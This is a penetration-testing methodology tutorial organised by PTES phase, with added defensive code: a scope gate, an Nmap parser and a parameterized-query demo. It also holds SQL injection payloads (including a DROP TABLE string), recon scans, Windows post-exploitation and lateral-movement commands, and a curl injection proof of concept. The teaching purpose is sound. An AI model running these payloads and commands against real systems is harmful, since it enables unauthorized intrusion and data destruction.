Penetration Testing Methodology


Introduction

Penetration testing simulates real-world attacks to identify security vulnerabilities before adversaries exploit them. A structured methodology ensures consistent, repeatable, and comprehensive assessments. The Penetration Testing Execution Standard (PTES) provides a widely adopted framework.

The PTES Standard

PTES defines seven phases for penetration testing, each with specific activities and deliverables.

Phase 1: Pre-Engagement Interactions

Define scope, rules of engagement, and legal boundaries before any testing begins.

rules_of_engagement:
  client: "ACME Corp"
  scope:
    in_scope:
      - "*.acme.com"
      - "203.0.113.0/24"
    out_of_scope:
      - "payment.acme.com"   # Production payment system
      - "10.0.0.0/8"         # Internal only

  restrictions:
    - no_social_engineering: true
    - no_dos_attacks: true
    - testing_window: "2026-05-15T00:00Z - 2026-05-19T23:59Z"
    - notification_list: ["security@acme.com", "incident-response@acme.com"]

  legal:
    - authorized_signatory: "Jane Doe, CISO"
    - insurance_coverage: true
    - data_handling_nda_signed: true

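A rules-of-engagement file is only useful if tooling actually enforces it. The following is an added example (not part of the original page and not any PTES tooling) of a scope gate that a test harness can call before touching a host: exclusions win over inclusions, hostnames are matched as globs, IPs against CIDRs, and the action must also fall inside the testing window. The ROE dict, its flattened shape, and the sample targets are constructed from the YAML above.

```python
import ipaddress
from datetime import datetime, timezone
from fnmatch import fnmatchcase

# Constructed, flattened view of the rules_of_engagement above (assumption:
# this dict shape is ours, not the format any particular tool loads).
ROE = {
    "in_scope": ["*.acme.com", "203.0.113.0/24"],
    "out_of_scope": ["payment.acme.com", "10.0.0.0/8"],
    "testing_window": "2026-05-15T00:00Z - 2026-05-19T23:59Z",
}


def _matches(target, entry):
    """True if a target (hostname or IP) is covered by one scope entry,
    which is either an IP/CIDR or a glob-style hostname pattern."""
    try:
        net = ipaddress.ip_network(entry, strict=False)
    except ValueError:
        net = None  # not an address: treat the entry as a hostname pattern
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        addr = None  # not an address: the target is a hostname
    if net is not None:
        # CIDR entries only ever match IP targets
        return addr is not None and addr in net
    # Hostname pattern: case-insensitive glob; an entry without wildcards
    # (e.g. payment.acme.com) is an exact match
    return addr is None and fnmatchcase(target.lower(), entry.lower())


def in_scope(target, roe=ROE):
    """Exclusions take precedence: a target is authorized only if it matches
    some in_scope entry and no out_of_scope entry."""
    if any(_matches(target, e) for e in roe["out_of_scope"]):
        return False
    return any(_matches(target, e) for e in roe["in_scope"])


def parse_utc(stamp):
    """Parse the 'YYYY-MM-DDTHH:MMZ' form used in the testing_window."""
    return datetime.strptime(stamp.strip(), "%Y-%m-%dT%H:%MZ").replace(tzinfo=timezone.utc)


def within_window(when, roe=ROE):
    """True if the timezone-aware datetime lies inside the testing window."""
    start_s, end_s = roe["testing_window"].split(" - ")
    return parse_utc(start_s) <= when <= parse_utc(end_s)


def authorized(target, when, roe=ROE):
    """Gate a test action on both scope and time; refuse on either failure."""
    return in_scope(target, roe) and within_window(when, roe)


if __name__ == "__main__":
    now = parse_utc("2026-05-16T12:00Z")
    for t in ["www.acme.com", "payment.acme.com", "203.0.113.7", "10.1.2.3"]:
        print(f"{t:20} authorized={authorized(t, now)}")
```

Wiring `authorized()` in front of every scanner invocation turns the ROE document into a control rather than a promise; a refused target is also worth logging, since a tester repeatedly hitting out-of-scope hosts is a sign the scope file and the engagement have drifted apart.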

Phase 2: Intelligence Gathering (Reconnaissance)

Reconnaissance builds a target profile through passive and active information gathering.

# DNS enumeration (an axfr request is active, not passive, recon)
dig axfr @ns1.acme.com acme.com
dnsrecon -d acme.com -t axfr
dnsrecon -d acme.com -t std --db acme_recon.db

# Subdomain discovery
sublist3r -d acme.com -o subdomains.txt

# Technology fingerprinting
whatweb -a 3 https://www.acme.com --log-verbose=tech_report.txt

# Certificate transparency logs
curl -s "https://crt.sh/?q=%.acme.com&output=json" | jq -r '.[].name_value' | sort -u


Phase 3: Vulnerability Analysis

Analyze gathered information to identify potential vulnerabilities.

# Port scanning with Nmap
nmap -sV -sC -O -p- --min-rate=1000 -oA acme_scan 203.0.113.0/24

# Service enumeration
nmap -sV --script=http-enum,http-headers,http-methods,ssl-enum-ciphers \
     -p 80,443 203.0.113.0/24 -oA acme_web_scan

# Vulnerability scanning
nmap --script=vuln -p 80,443,22,3389 203.0.113.0/24 -oA acme_vuln

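The -oA prefix used above writes three files, and the grepable .gnmap one is the easiest to turn into an inventory for analysis. The following is an added example (not from the page and not part of Nmap) that parses that format into a per-host structure, lists open ports, and flags open ports with no version banner, which need manual service enumeration before any vulnerability conclusion is drawn. The sample scan text, hosts and banners are constructed.

```python
import re

# Constructed sample in Nmap's grepable (.gnmap) format. Each 'Ports:' item is
# port/state/protocol/owner/service/rpc_info/version/ with a trailing slash.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Fri May 15 09:00:00 2026 as: nmap -sV -sC -O -p- -oA acme_scan 203.0.113.0/24
Host: 203.0.113.10 (www.acme.com)\tStatus: Up
Host: 203.0.113.10 (www.acme.com)\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu/, 80/open/tcp//http//nginx 1.18.0/, 443/open/tcp//http//nginx 1.18.0/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (65531)
Host: 203.0.113.25 ()\tStatus: Up
Host: 203.0.113.25 ()\tPorts: 445/open/tcp//microsoft-ds//Windows Server 2019 microsoft-ds/, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (65533)
# Nmap done at Fri May 15 09:42:11 2026 -- 256 IP addresses (2 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "ports": [dict, ...]}}.
    'Status:' records only register the host; 'Ports:' records add services."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '# Nmap ...' comment lines and anything unexpected
        ip, hostname, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key != "Ports":
                continue  # 'Status', 'Ignored State', etc.
            for item in value.split(", "):
                # maxsplit keeps any '/' inside the version banner intact
                port, state, proto, _owner, service, _rpc, version = item.split("/", 6)
                entry["ports"].append({
                    "port": int(port), "proto": proto, "state": state,
                    "service": service, "version": version.rstrip("/"),
                })
    return hosts


def open_ports(hosts, ip):
    """Sorted open port numbers for one host (empty if the host is unknown)."""
    return sorted(p["port"] for p in hosts.get(ip, {"ports": []})["ports"]
                  if p["state"] == "open")


def unfingerprinted(hosts):
    """(ip, port) pairs that are open but carry no version banner."""
    return [(ip, p["port"]) for ip, h in hosts.items() for p in h["ports"]
            if p["state"] == "open" and not p["version"]]


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for ip, host in inventory.items():
        print(ip, host["hostname"] or "-", open_ports(inventory, ip))
    print("needs manual enumeration:", unfingerprinted(inventory))
```

Feeding this inventory into the service-enumeration step (instead of re-reading scan output by eye) keeps the vulnerability analysis tied to what was actually observed, and the unfingerprinted list is the natural worklist for the targeted NSE scans shown above.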

Phase 4: Exploitation

Exploitation attempts to breach the target using identified vulnerabilities.

# Custom exploit example — SQL injection test
import time

import requests


def test_sqli(url, params):
    """Send classic SQL injection strings in each query parameter and flag
    responses that suggest time-based or error-based injection."""
    payloads = [
        "' OR '1'='1",
        "' UNION SELECT NULL,NULL--",
        "1; DROP TABLE users--",
        "' WAITFOR DELAY '00:00:05'--",
    ]

    for param in params:
        for payload in payloads:
            test_params = params.copy()
            test_params[param] = payload

            start = time.time()
            resp = requests.get(url, params=test_params, timeout=10)
            elapsed = time.time() - start

            # Time-based detection: the WAITFOR payload should stall the response
            if elapsed > 5:
                print(f"[!] Time-based SQLi in {param}: {payload}")

            # Error-based detection: database error text leaking into the page
            if any(err in resp.text for err in ["SQL syntax", "mysql_fetch", "ORA-"]):
                print(f"[!] Error-based SQLi in {param}: {payload}")

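What the probe above is looking for is the code pattern in the report's finding F-001: user input concatenated into a query. The following added example (not from the page) shows that pattern beside the parameterized form the finding's remediation asks for, using an in-memory SQLite table with constructed rows, so the difference can be observed directly: the same `' OR '1'='1` input returns every row from the vulnerable query and nothing from the safe one, and a lone quote raises a database error from the vulnerable query (the signal the error-based check relies on) but is just an unmatched value for the safe one.

```python
import sqlite3


def make_db():
    """In-memory products table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("widget", 9.99), ("gadget", 19.99), ("gizmo", 4.50)])
    return conn


def search_vulnerable(conn, query):
    """The pattern finding F-001 describes: the input becomes SQL syntax."""
    sql = f"SELECT name FROM products WHERE name = '{query}'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, query):
    """Parameterized query: the driver passes the value separately, so quotes
    and keywords inside it are data, never syntax."""
    sql = "SELECT name FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (query,))]


def demo():
    """Run both forms against a normal value, the tautology probe from the
    test above, and a lone quote; return the observations for comparison."""
    conn = make_db()
    probe = "' OR '1'='1"
    try:
        search_vulnerable(conn, "'")
        vulnerable_error = None
    except sqlite3.OperationalError as exc:
        vulnerable_error = str(exc)  # the leak an error-based check would spot
    return {
        "normal_vulnerable": search_vulnerable(conn, "widget"),
        "normal_safe": search_safe(conn, "widget"),
        "probe_vulnerable": search_vulnerable(conn, probe),
        "probe_safe": search_safe(conn, probe),
        "quote_vulnerable_error": vulnerable_error,
        "quote_safe": search_safe(conn, "'"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:24} {value!r}")
```

The two functions differ by one line, which is why the remediation is cheap to apply and easy to verify in code review: any query built with string formatting or concatenation is a finding candidate regardless of what the input validation in front of it does.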

Phase 5: Post-Exploitation

After gaining access, assess the value of compromised systems and establish persistence.

# Post-exploitation enumeration
whoami /all
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
net localgroup administrators
netstat -ano
wmic product get name,version

# Lateral movement check
powershell -Command "Get-WmiObject -Class Win32_ComputerSystem -ComputerName TARGET"


Phase 6: Reporting

The report is the primary deliverable. It must be clear, actionable, and properly scoped for different audiences.

report_structure:
  executive_summary:
    - risk_rating: "High"
    - total_findings: 12
    - critical: 2
    - high: 4
    - medium: 4
    - low: 2
    - business_impact: "SQL injection in main application could lead to complete data breach"

  technical_findings:
    - finding_id: "F-001"
      title: "SQL Injection in /api/search endpoint"
      severity: "Critical"
      cvss: 9.1
      description: "User input is directly concatenated into SQL queries"
      affected_endpoint: "POST /api/search"
      poc: "curl -X POST https://app.acme.com/api/search -d 'query=1%27+OR+%271%27%3D%271'"
      remediation: "Use parameterized queries; implement input validation"

  remediation_timeline:
    - immediate: "Patch critical SQL injection and RCE vulnerabilities"
    - short_term: "Implement WAF and input validation"
    - long_term: "Security training for developers, SAST integration in CI/CD"


Phase 7: Post-Engagement

Remove test artifacts from client systems, securely destroy collected evidence under the agreed data-handling terms, and hold a lessons-learned review with the client.

Conclusion

Effective penetration testing follows a disciplined methodology. PTES provides comprehensive coverage from legal agreements through reporting. The true value of a pentest lies not in how many vulnerabilities are found, but in the actionable remediation guidance provided in the final report.